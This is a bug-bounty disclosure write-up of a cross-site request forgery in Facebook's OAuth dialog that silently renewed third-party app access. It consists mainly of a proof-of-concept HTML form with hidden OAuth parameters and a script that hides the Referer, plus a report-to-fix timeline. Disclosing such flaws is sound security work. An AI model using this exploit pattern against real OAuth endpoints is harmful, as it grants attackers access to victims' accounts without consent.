[Facebook] CSRF to renew access to Apps
An attacker could renew a third-party app's expired access to the victim's Facebook account without the victim's consent: a cross-site request to the OAuth dialog re-granted the app's previously approved scopes with no consent prompt, so the victim never had to click anything.
CSRF POC - the form below has no method attribute, so it submits as a top-level GET navigation to the OAuth dialog; the victim's session cookies are sent with it even if they are marked SameSite=Lax.
<html>
<body>
<!-- Rewrite the page URL so the Referer sent with the navigation does not reveal the PoC path -->
<script>history.pushState('', '', '/')</script>
<!-- Top-level GET to the OAuth dialog, replaying the parameters the Facebook JS SDK popup normally sends -->
<form action="https://www.facebook.com/v2.3/dialog/oauth">
  <input type="hidden" name="app_id" value="XXX" />
  <input type="hidden" name="auth_type" value="" />
  <input type="hidden" name="cbt" value="1622970398155" />
  <input type="hidden" name="channel_url" value="https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46#cb=f11c70b8d77d13&domain=www.jiosaavn.com&origin=https%3A%2F%2Fwww.jiosaavn.com%2Ff1e7baa12b0f5a4&relation=opener" />
  <input type="hidden" name="client_id" value="XXX" />
  <input type="hidden" name="display" value="popup" />
  <input type="hidden" name="domain" value="www.XXX.com" />
  <input type="hidden" name="e2e" value="{}" />
  <input type="hidden" name="fallback_redirect_uri" value="https://www.XXX.com/signup?redirect=/" />
  <input type="hidden" name="fx_app" value="facebook" />
  <input type="hidden" name="locale" value="en_US" />
  <input type="hidden" name="logger_id" value="f256cfb96281ce4" />
  <input type="hidden" name="origin" value="1" />
  <input type="hidden" name="redirect_uri" value="https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46#cb=f232d7fd018cdac&domain=www.jiosaavn.com&origin=https%3A%2F%2Fwww.XXX.com%2Ff1e7baa12b0f5a4&relation=opener&frame=f3505dbd2db68" />
  <!-- Token response type: the dialog hands an access token straight back through xd_arbiter -->
  <input type="hidden" name="response_type" value="token,signed_request,graph_domain" />
  <input type="hidden" name="return_scopes" value="false" />
  <input type="hidden" name="scope" value="public_profile,email" />
  <input type="hidden" name="sdk" value="joey" />
  <input type="hidden" name="version" value="v2.3" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>
Timeline -
Reported - Sunday, June 6, 2021
Triaged - Friday, June 18, 2021
Rewarded - Thursday, September 9, 2021 [with bonus]
Fixed - Tuesday, November 30, 2021